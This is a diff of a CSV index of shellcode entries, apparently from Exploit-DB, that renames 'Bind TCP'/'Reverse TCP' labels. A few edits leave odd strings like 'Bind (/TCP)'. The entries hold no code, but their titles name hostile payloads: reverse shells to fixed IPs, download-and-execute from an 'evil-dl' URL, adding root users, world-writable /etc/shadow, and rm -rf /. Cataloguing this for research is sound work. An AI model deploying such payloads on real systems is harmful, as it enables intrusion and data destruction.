Shellcode (88+ bytes) (Generator)",2006-04-21,phar,shellcode,generator +13298,shellcodes/linux_mips/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind (4919/TCP) Shell (/bin/sh) Shellcode (276 bytes)",2008-08-18,vaicebine,shellcode,linux_mips 13299,shellcodes/linux_mips/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]) Shellcode (60 bytes)",2008-08-18,vaicebine,shellcode,linux_mips 13300,shellcodes/linux_mips/13300.c,"Linux/MIPS (Little Endian) - execve(/bin/sh) Shellcode (56 bytes)",2005-11-09,core,shellcode,linux_mips 13301,shellcodes/linux_ppc/13301.c,"Linux/PPC - execve(/bin/sh) Shellcode (60 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc 13302,shellcodes/linux_ppc/13302.c,"Linux/PPC - read + exec Shellcode (32 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc -13303,shellcodes/linux_ppc/13303.c,"Linux/PPC - Reverse TCP (192.168.1.1:31337/TCP) Shell (/bin/sh) Shellcode (240 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc +13303,shellcodes/linux_ppc/13303.c,"Linux/PPC - Reverse (192.168.1.1:31337/TCP) Shell (/bin/sh) Shellcode (240 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc 13304,shellcodes/linux_ppc/13304.c,"Linux/PPC - execve(/bin/sh) Shellcode (112 bytes)",2004-09-12,Palante,shellcode,linux_ppc -13305,shellcodes/linux_sparc/13305.c,"Linux/SPARC - Reverse TCP (192.168.100.1:2313/TCP) Shell Shellcode (216 bytes)",2004-09-26,killah,shellcode,linux_sparc -13306,shellcodes/linux_sparc/13306.c,"Linux/SPARC - Bind TCP (8975/TCP) Shell + Null-Free Shellcode (284 bytes)",2004-09-12,killah,shellcode,linux_sparc +13305,shellcodes/linux_sparc/13305.c,"Linux/SPARC - Reverse (192.168.100.1:2313/TCP) Shell Shellcode (216 bytes)",2004-09-26,killah,shellcode,linux_sparc +13306,shellcodes/linux_sparc/13306.c,"Linux/SPARC - Bind (8975/TCP) Shell + Null-Free Shellcode (284 bytes)",2004-09-12,killah,shellcode,linux_sparc 13307,shellcodes/linux_x86/13307.c,"Linux/x86 - /bin/sh + Self-Modifying Anti-IDS Shellcode (35/64 bytes)",2009-09-15,XenoMuta,shellcode,linux_x86 13308,shellcodes/linux_x86/13308.c,"Linux/x86 - HTTP Server (8800/TCP) + fork() Shellcode (166 bytes)",2009-09-15,XenoMuta,shellcode,linux_x86 -13309,shellcodes/linux_x86/13309.asm,"Linux/x86 - Bind TCP Listener (5555/TCP) + Receive Shellcode + Payload Loader Shellcode (83 bytes)",2009-09-09,XenoMuta,shellcode,linux_x86 +13309,shellcodes/linux_x86/13309.asm,"Linux/x86 - Bind (/TCP) Listener (5555/TCP) + Receive Shellcode + Payload Loader Shellcode (83 bytes)",2009-09-09,XenoMuta,shellcode,linux_x86 13310,shellcodes/linux_x86/13310.c,"Linux/x86 - Disable Network Card + Polymorphic Shellcode (75 bytes)",2009-08-26,"Jonathan Salwan",shellcode,linux_x86 13311,shellcodes/linux_x86/13311.c,"Linux/x86 - killall5 + Polymorphic Shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",shellcode,linux_x86 13312,shellcodes/linux_x86/13312.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",shellcode,linux_x86 -13313,shellcodes/linux_x86/13313.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + XOR Encoded Shellcode (152 bytes)",2009-07-10,Rick,shellcode,linux_x86 +13313,shellcodes/linux_x86/13313.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) + XOR Encoded Shellcode (152 bytes)",2009-07-10,Rick,shellcode,linux_x86 13314,shellcodes/linux_x86/13314.c,"Linux/x86 - reboot() + Polymorphic Shellcode (57 bytes)",2009-06-29,"Jonathan Salwan",shellcode,linux_x86 13315,shellcodes/linux_x86/13315.c,"Linux/x86 - chmod 666 /etc/shadow + Polymorphic Shellcode (54 bytes)",2009-06-22,"Jonathan Salwan",shellcode,linux_x86 13316,shellcodes/linux_x86/13316.c,"Linux/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh__0_0) Shellcode (34 bytes)",2009-06-16,blue9057,shellcode,linux_x86 -13317,shellcodes/linux_x86/13317.s,"Linux/x86 - Bind TCP (8000/TCP) Shell + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86 -13318,shellcodes/linux_x86/13318.s,"Linux/x86 - Bind TCP (8000/TCP) Shell + Add Root User Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86 -13319,shellcodes/linux_x86/13319.s,"Linux/x86 - Bind TCP (8000/TCP) Shell (/bin/sh) Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",shellcode,linux_x86 +13317,shellcodes/linux_x86/13317.s,"Linux/x86 - Bind (8000/TCP) Shell + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86 +13318,shellcodes/linux_x86/13318.s,"Linux/x86 - Bind (8000/TCP) Shell + Add Root User Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86 +13319,shellcodes/linux_x86/13319.s,"Linux/x86 - Bind (8000/TCP) Shell (/bin/sh) Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",shellcode,linux_x86 13320,shellcodes/linux_x86-64/13320.c,"Linux/x64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,shellcode,linux_x86-64 13321,shellcodes/linux_x86/13321.c,"Linux/x86 - Serial Port Shell Binding (/dev/ttyS0) + busybox Launching Null-Free Shellcode (82 bytes)",2009-04-30,phar,shellcode,linux_x86 13322,shellcodes/linux_x86/13322.c,"Linux/x86 - File Unlinker Shellcode (18+ bytes)",2009-03-03,darkjoker,shellcode,linux_x86 @@ -84,7 +84,7 @@ id,file,description,date,author,type,platform 13326,shellcodes/linux_x86/13326.c,"Linux/x86 - killall5 Shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",shellcode,linux_x86 13327,shellcodes/linux_x86/13327.c,"Linux/x86 - reboot() + PUSH Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",shellcode,linux_x86 13328,shellcodes/generator/13328.c,"Linux/x86 - Shellcode Obfuscator + Null-Free (Generator)",2008-12-09,sm4x,shellcode,generator -13329,shellcodes/linux_x86/13329.c,"Linux/x86 - Reverse UDP (54321/UDP) tcpdump Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,shellcode,linux_x86 +13329,shellcodes/linux_x86/13329.c,"Linux/x86 - Reverse (54321/UDP) tcpdump Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,shellcode,linux_x86 13330,shellcodes/linux_x86/13330.c,"Linux/x86 - Append RSA Key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,shellcode,linux_x86 13331,shellcodes/linux_x86/13331.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access Shellcode (86 bytes)",2008-11-19,Rick,shellcode,linux_x86 13332,shellcodes/linux_x86/13332.c,"Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes)",2008-11-18,XenoMuta,shellcode,linux_x86 @@ -92,9 +92,9 @@ id,file,description,date,author,type,platform 13334,shellcodes/linux_x86/13334.txt,"Linux/x86 - setresuid(0_0_0) + /bin/sh Shellcode (35 bytes)",2008-09-29,sorrow,shellcode,linux_x86 13335,shellcodes/linux_x86/13335.c,"Linux/x86 - iopl(3) + asm(cli) + while(1){} Shellcode (12 bytes)",2008-09-17,dun,shellcode,linux_x86 13336,shellcodes/linux_x86/13336.c,"Linux/x86 - System Beep Shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",shellcode,linux_x86 -13337,shellcodes/linux_x86/13337.c,"Linux/x86 - Reverse TCP (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,shellcode,linux_x86 +13337,shellcodes/linux_x86/13337.c,"Linux/x86 - Reverse (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,shellcode,linux_x86 13338,shellcodes/linux_x86/13338.c,"Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes)",2008-08-19,Reth,shellcode,linux_x86 -13339,shellcodes/linux_x86/13339.asm,"Linux/x86 - Reverse TCP (8192/TCP) cat /etc/shadow Shellcode (155 bytes)",2008-08-18,0in,shellcode,linux_x86 +13339,shellcodes/linux_x86/13339.asm,"Linux/x86 - Reverse (8192/TCP) cat /etc/shadow Shellcode (155 bytes)",2008-08-18,0in,shellcode,linux_x86 13340,shellcodes/linux_x86/13340.c,"Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,shellcode,linux_x86 13341,shellcodes/linux_x86/13341.c,"Linux/x86 - /bin/rm -rf / + Attempts To Block The Process From Being Stopped Shellcode (132 bytes)",2008-08-18,onionring,shellcode,linux_x86 13342,shellcodes/linux_x86/13342.c,"Linux/x86 - setuid(0) + setgid(0) + aslr_off (Disable ASLR Security) Shellcode (79 bytes)",2008-08-18,LiquidWorm,shellcode,linux_x86 @@ -115,21 +115,21 @@ id,file,description,date,author,type,platform 13357,shellcodes/linux_x86/13357.c,"Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86 13358,shellcodes/linux_x86/13358.c,"Linux/x86 - execve(/bin/sh) + Re-Use Of Strings In .rodata Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86 13359,shellcodes/linux_x86/13359.c,"Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86 -13360,shellcodes/linux_x86/13360.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid() Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86 -13361,shellcodes/linux_x86/13361.c,"Linux/x86 - Bind TCP (2707/TCP) Shell Shellcode (84 bytes)",2006-07-04,oveRet,shellcode,linux_x86 +13360,shellcodes/linux_x86/13360.c,"Linux/x86 - Bind (31337/TCP) Shell (/bin/sh) + setuid() Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86 +13361,shellcodes/linux_x86/13361.c,"Linux/x86 - Bind (2707/TCP) Shell Shellcode (84 bytes)",2006-07-04,oveRet,shellcode,linux_x86 13362,shellcodes/linux_x86/13362.c,"Linux/x86 - execve() + Diassembly + Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,shellcode,linux_x86 -13363,shellcodes/linux_x86/13363.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",shellcode,linux_x86 -13364,shellcodes/generator/13364.c,"Linux/x86 - Reverse TCP (192.168.13.22:31337/TCP) Shell (/bin/sh) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",shellcode,generator +13363,shellcodes/linux_x86/13363.c,"Linux/x86 - Bind (31337/TCP) Shell (/bin/sh) Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",shellcode,linux_x86 +13364,shellcodes/generator/13364.c,"Linux/x86 - Reverse (192.168.13.22:31337/TCP) Shell (/bin/sh) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",shellcode,generator 13365,shellcodes/linux_x86/13365.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (2)",2006-05-01,hophet,shellcode,linux_x86 -13366,shellcodes/linux_x86/13366.txt,"Linux/x86 - Reverse TCP (127.0.0.1:80/TCP) Shell + XOR Encoded Shellcode (371 bytes)",2006-04-18,xort,shellcode,linux_x86 +13366,shellcodes/linux_x86/13366.txt,"Linux/x86 - Reverse (127.0.0.1:80/TCP) Shell + XOR Encoded Shellcode (371 bytes)",2006-04-18,xort,shellcode,linux_x86 13367,shellcodes/linux_x86/13367.c,"Linux/x86 - execve(/bin/sh) + '.ZIP' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,linux_x86 13368,shellcodes/linux_x86/13368.c,"Linux/x86 - execve(/bin/sh) + '.RTF' Header Shellcode (30 bytes)",2006-04-17,izik,shellcode,linux_x86 13369,shellcodes/linux_x86/13369.c,"Linux/x86 - execve(/bin/sh) + '.RIFF' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,linux_x86 13370,shellcodes/linux_x86/13370.c,"Linux/x86 - execve(/bin/sh) + '.BMP' Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,shellcode,linux_x86 13371,shellcodes/linux_x86/13371.c,"Linux/x86 - Read SWAP + Write To /tmp/swr Shellcode (109 bytes)",2006-04-16,"Gotfault Security",shellcode,linux_x86 13372,shellcodes/linux_x86/13372.c,"Linux/x86 - Read /tmp/sws + Store In SWAP Shellcode (99 bytes)",2006-04-16,"Gotfault Security",shellcode,linux_x86 -13373,shellcodes/linux_x86/13373.c,"Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) + Password (gotfault) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",shellcode,linux_x86 -13374,shellcodes/linux_x86/13374.c,"Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) Shellcode (86 bytes)",2006-04-06,"Gotfault Security",shellcode,linux_x86 +13373,shellcodes/linux_x86/13373.c,"Linux/x86 - Bind (64713/TCP) Shell (/bin/sh) + Password (gotfault) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",shellcode,linux_x86 +13374,shellcodes/linux_x86/13374.c,"Linux/x86 - Bind (64713/TCP) Shell (/bin/sh) Shellcode (86 bytes)",2006-04-06,"Gotfault Security",shellcode,linux_x86 13375,shellcodes/linux_x86/13375.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (25 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86 13376,shellcodes/linux_x86/13376.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (23 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86 13377,shellcodes/linux_x86/13377.c,"Linux/x86 - setuid(0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (31 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86 @@ -142,13 +142,13 @@ id,file,description,date,author,type,platform 13384,shellcodes/linux_x86/13384.c,"Linux/x86 - execve(/bin/sh) Shellcode + 1 Encoded (39 bytes)",2006-01-25,izik,shellcode,linux_x86 13385,shellcodes/linux_x86/13385.c,"Linux/x86 - Add Root User (xtz) To /etc/passwd + No Password Shellcode (59 bytes)",2006-01-21,izik,shellcode,linux_x86 13386,shellcodes/linux_x86/13386.c,"Linux/x86 - execve(/bin/sh) + Anti-Debug Trick (INT 3h trap) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86 -13387,shellcodes/linux_x86/13387.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (80 bytes)",2006-01-21,izik,shellcode,linux_x86 -13388,shellcodes/linux_x86/13388.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (98 bytes)",2006-01-21,izik,shellcode,linux_x86 +13387,shellcodes/linux_x86/13387.c,"Linux/x86 - Bind (31337/TCP) Shell (/bin/sh) Shellcode (80 bytes)",2006-01-21,izik,shellcode,linux_x86 +13388,shellcodes/linux_x86/13388.c,"Linux/x86 - Bind (31337/TCP) Shell (/bin/sh) + fork() Shellcode (98 bytes)",2006-01-21,izik,shellcode,linux_x86 13389,shellcodes/linux_x86/13389.c,"Linux/x86 - Eject CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86 13390,shellcodes/linux_x86/13390.c,"Linux/x86 - Eject CD-Rom (Follows /dev/cdrom Symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,shellcode,linux_x86 13391,shellcodes/linux_x86/13391.c,"Linux/x86 - Eject/Close CD-Rom Loop (Follows /dev/cdrom Symlink) Shellcode (45 bytes)",2006-01-21,izik,shellcode,linux_x86 13392,shellcodes/linux_x86/13392.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (32 bytes)",2006-01-21,izik,shellcode,linux_x86 -13393,shellcodes/linux_x86/13393.c,"Linux/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell Shellcode (74 bytes)",2006-01-21,izik,shellcode,linux_x86 +13393,shellcodes/linux_x86/13393.c,"Linux/x86 - Reverse (127.0.0.1:31337/TCP) Shell Shellcode (74 bytes)",2006-01-21,izik,shellcode,linux_x86 13394,shellcodes/linux_x86/13394.c,"Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes)",2006-01-21,izik,shellcode,linux_x86 13395,shellcodes/linux_x86/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)",2006-01-21,izik,shellcode,linux_x86 13396,shellcodes/linux_x86/13396.c,"Linux/x86 - (eax != 0 and edx == 0) + exit() Shellcode (4 bytes)",2006-01-21,izik,shellcode,linux_x86 @@ -156,7 +156,7 @@ id,file,description,date,author,type,platform 13398,shellcodes/linux_x86/13398.c,"Linux/x86 - setreuid(0_ 0) + execve(/bin/sh) Shellcode (31 bytes)",2006-01-21,izik,shellcode,linux_x86 13399,shellcodes/linux_x86/13399.c,"Linux/x86 - execve(/bin/sh) + PUSH Shellcode (23 bytes)",2006-01-21,izik,shellcode,linux_x86 13400,shellcodes/linux_x86/13400.c,"Linux/x86 - cat /dev/urandom > /dev/console Shellcode (63 bytes)",2006-01-21,izik,shellcode,linux_x86 -13401,shellcodes/generator/13401.c,"Linux/x86 - Reverse TCP Shell Shellcode (90 bytes) (Generator)",2005-12-28,xort,shellcode,generator +13401,shellcodes/generator/13401.c,"Linux/x86 - Reverse (/TCP) Shell Shellcode (90 bytes) (Generator)",2005-12-28,xort,shellcode,generator 13402,shellcodes/linux_x86/13402.c,"Linux/x86 - Socket-Proxy (31337:11.22.33.44:80) Shellcode (372 bytes)",2005-12-28,xort,shellcode,linux_x86 13403,shellcodes/linux_x86/13403.c,"Linux/x86 - dup2(0_0) + dup2(0_1) + dup2(0_2) Shellcode (15 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86 13404,shellcodes/linux_x86/13404.c,"Linux/x86 - if(read(fd_buf_512)<=2) _exit(1) else buf() Shellcode (29 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86 @@ -182,7 +182,7 @@ id,file,description,date,author,type,platform 13424,shellcodes/linux_x86/13424.c,"Linux/x86 - execve(/bin/sh) + Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,shellcode,linux_x86 13425,shellcodes/linux_x86/13425.c,"Linux/IA32 - execve(/bin/sh) + 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,shellcode,linux_x86 13426,shellcodes/bsd_x86/13426.c,"BSD/x86 - symlink /bin/sh + XORing Encoded Shellcode (56 bytes)",2004-09-26,dev0id,shellcode,bsd_x86 -13427,shellcodes/linux_x86/13427.c,"Linux/x86 - Bind TCP (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,shellcode,linux_x86 +13427,shellcodes/linux_x86/13427.c,"Linux/x86 - Bind (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,shellcode,linux_x86 13428,shellcodes/linux_x86/13428.c,"Linux/x86 - Add Root User (t00r) To /etc/passwd + Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86 13429,shellcodes/linux_x86/13429.c,"Linux/x86 - chmod 666 /etc/shadow + Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86 13430,shellcodes/bsd_x86/13430.c,"BSD/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,shellcode,bsd_x86 @@ -190,8 +190,8 @@ id,file,description,date,author,type,platform 13432,shellcodes/linux_x86/13432.c,"Linux/x86 - Execute At Shared Memory Shellcode (50 bytes)",2004-09-26,sloth,shellcode,linux_x86 13433,shellcodes/linux_x86/13433.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes)",2004-09-26,UnboundeD,shellcode,linux_x86 13434,shellcodes/linux_x86/13434.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes)",2004-09-26,dev0id,shellcode,linux_x86 -13435,shellcodes/linux_x86/13435.c,"Linux/x86 - Reverse TCP (200.182.207.235/TCP) Telnet Shel Shellcode (134 bytes)",2004-09-26,hts,shellcode,linux_x86 -13436,shellcodes/linux_x86/13436.c,"Linux/x86 - Reverse TCP Shell (/bin/sh) Shellcode (120 bytes)",2004-09-26,lamagra,shellcode,linux_x86 +13435,shellcodes/linux_x86/13435.c,"Linux/x86 - Reverse (200.182.207.235/TCP) Telnet Shel Shellcode (134 bytes)",2004-09-26,hts,shellcode,linux_x86 +13436,shellcodes/linux_x86/13436.c,"Linux/x86 - Reverse (/TCP) Shell (/bin/sh) Shellcode (120 bytes)",2004-09-26,lamagra,shellcode,linux_x86 13437,shellcodes/linux_x86/13437.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86 13438,shellcodes/linux_x86/13438.c,"Linux/x86 - cp /bin/sh /tmp/katy + chmod 4555 katy Shellcode (126 bytes)",2004-09-26,RaiSe,shellcode,linux_x86 13439,shellcodes/linux_x86/13439.c,"Linux/x86 - Eject /dev/cdrom Shellcode (64 bytes)",2004-09-26,lamagra,shellcode,linux_x86 @@ -203,8 +203,8 @@ id,file,description,date,author,type,platform 13445,shellcodes/linux_x86/13445.c,"Linux/x86 - execve(/bin/sh) Shellcode (38 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 13446,shellcodes/linux_x86/13446.c,"Linux/x86 - execve(/bin/sh) Shellcode (30 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 13447,shellcodes/linux_x86/13447.c,"Linux/x86 - execve(/bin/sh) + setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,shellcode,linux_x86 -13448,shellcodes/linux_x86/13448.c,"Linux/x86 - Bind TCP (5074/TCP) Shell Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 -13449,shellcodes/linux_x86/13449.c,"Linux/x86 - Bind TCP (5074/TCP) Shell + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 +13448,shellcodes/linux_x86/13448.c,"Linux/x86 - Bind (5074/TCP) Shell Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 +13449,shellcodes/linux_x86/13449.c,"Linux/x86 - Bind (5074/TCP) Shell + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 13450,shellcodes/linux_x86/13450.c,"Linux/x86 - Add Root User (t00r) To /etc/passwd Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 13451,shellcodes/linux_x86/13451.c,"Linux/x86 - Add Root User Shellcode (104 bytes)",2004-09-12,"Matt Conover",shellcode,linux_x86 13452,shellcodes/linux_x86/13452.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (28 bytes)",2004-09-12,dev0id,shellcode,linux_x86 @@ -218,7 +218,7 @@ id,file,description,date,author,type,platform 13460,shellcodes/linux_x86/13460.c,"Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,shellcode,linux_x86 13461,shellcodes/linux_x86/13461.c,"Linux/x86 - Add Root User (z) To /etc/passwd Shellcode (70 bytes)",2000-08-07,anonymous,shellcode,linux_x86 13462,shellcodes/linux_x86/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve(/bin/sh) Shellcode (132 bytes)",2000-08-07,anonymous,shellcode,linux_x86 -13463,shellcodes/linux_x86-64/13463.c,"Linux/x64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,shellcode,linux_x86-64 +13463,shellcodes/linux_x86-64/13463.c,"Linux/x64 - Bind (4444/TCP) Shell Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,shellcode,linux_x86-64 13464,shellcodes/linux_x86-64/13464.s,"Linux/x64 - execve(/bin/sh) Shellcode (33 bytes)",2006-11-02,hophet,shellcode,linux_x86-64 13465,shellcodes/multiple/13465.c,"Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)",2005-11-15,"Charles Stevenson",shellcode,multiple 13466,shellcodes/multiple/13466.c,"OSX/PPC / OSX/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)",2005-11-13,nemo,shellcode,multiple @@ -226,12 +226,12 @@ id,file,description,date,author,type,platform 13468,shellcodes/multiple/13468.c,"Linux/x86 / Unix/SPARC - execve(/bin/sh) Shellcode (80 bytes)",2004-09-12,dymitri,shellcode,multiple 13469,shellcodes/multiple/13469.c,"BSD/x86 / Linux/x86 - execve(/bin/sh) Shellcode (38 bytes)",2004-09-12,dymitri,shellcode,multiple 13470,shellcodes/netbsd_x86/13470.c,"NetBSD/x86 - Kill All Processes Shellcode (23 bytes)",2009-06-18,anonymous,shellcode,netbsd_x86 -13471,shellcodes/netbsd_x86/13471.c,"NetBSD/x86 - Reverse TCP (6666/TCP) Shell Shellcode (83 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86 +13471,shellcodes/netbsd_x86/13471.c,"NetBSD/x86 - Reverse (6666/TCP) Shell Shellcode (83 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86 13472,shellcodes/netbsd_x86/13472.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (29 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86 13473,shellcodes/netbsd_x86/13473.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (30 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86 13474,shellcodes/netbsd_x86/13474.c,"NetBSD/x86 - execve(/bin/sh) Shellcode (68 bytes)",2004-09-26,humble,shellcode,netbsd_x86 13475,shellcodes/openbsd_x86/13475.c,"OpenBSD/x86 - execve(/bin/sh) Shellcode (23 bytes)",2006-05-01,hophet,shellcode,openbsd_x86 -13476,shellcodes/openbsd_x86/13476.c,"OpenBSD/x86 - Bind TCP (6969/TCP) Shell Shellcode (148 bytes)",2004-09-26,"Sinan Eren",shellcode,openbsd_x86 +13476,shellcodes/openbsd_x86/13476.c,"OpenBSD/x86 - Bind (6969/TCP) Shell Shellcode (148 bytes)",2004-09-26,"Sinan Eren",shellcode,openbsd_x86 13477,shellcodes/openbsd_x86/13477.c,"OpenBSD/x86 - Add Root User (w00w00) Shellcode (112 bytes)",2004-09-26,anonymous,shellcode,openbsd_x86 13478,shellcodes/osx_ppc/13478.c,"OSX/PPC - sync() + reboot() Shellcode (32 bytes)",2006-05-01,hophet,shellcode,osx_ppc 13479,shellcodes/osx_ppc/13479.c,"OSX/PPC - execve(/bin/sh) + exit() Shellcode (72 bytes)",2006-05-01,hophet,shellcode,osx_ppc @@ -246,20 +246,20 @@ id,file,description,date,author,type,platform 13488,shellcodes/sco_x86/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL) Shellcode (43 bytes)",2005-11-30,"p. minervini",shellcode,sco_x86 13489,shellcodes/solaris_mips/13489.c,"Solaris/MIPS - Download File (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes)",2006-11-21,xort,shellcode,solaris_mips 13490,shellcodes/solaris_sparc/13490.c,"Solaris/SPARC - setreuid() + Executes Command Shellcode (92+ bytes)",2006-10-21,bunker,shellcode,solaris_sparc -13491,shellcodes/generator/13491.c,"Solaris/MIPS - Reverse TCP (10.0.0.3:44434/TCP) Shell + XNOR Encoded Traffic Shellcode (600 bytes) (Generator)",2006-07-21,xort,shellcode,generator +13491,shellcodes/generator/13491.c,"Solaris/MIPS - Reverse (10.0.0.3:44434/TCP) Shell + XNOR Encoded Traffic Shellcode (600 bytes) (Generator)",2006-07-21,xort,shellcode,generator 13492,shellcodes/solaris_sparc/13492.c,"Solaris/SPARC - setreuid() + execve() Shellcode (56 bytes)",2005-11-20,lhall,shellcode,solaris_sparc -13493,shellcodes/solaris_sparc/13493.c,"Solaris/SPARC - Bind TCP (6666/TCP) Shell Shellcode (240 bytes)",2005-11-20,lhall,shellcode,solaris_sparc +13493,shellcodes/solaris_sparc/13493.c,"Solaris/SPARC - Bind (6666/TCP) Shell Shellcode (240 bytes)",2005-11-20,lhall,shellcode,solaris_sparc 13494,shellcodes/solaris_sparc/13494.c,"Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,shellcode,solaris_sparc -13495,shellcodes/solaris_sparc/13495.c,"Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes)",2004-09-26,"Claes M. 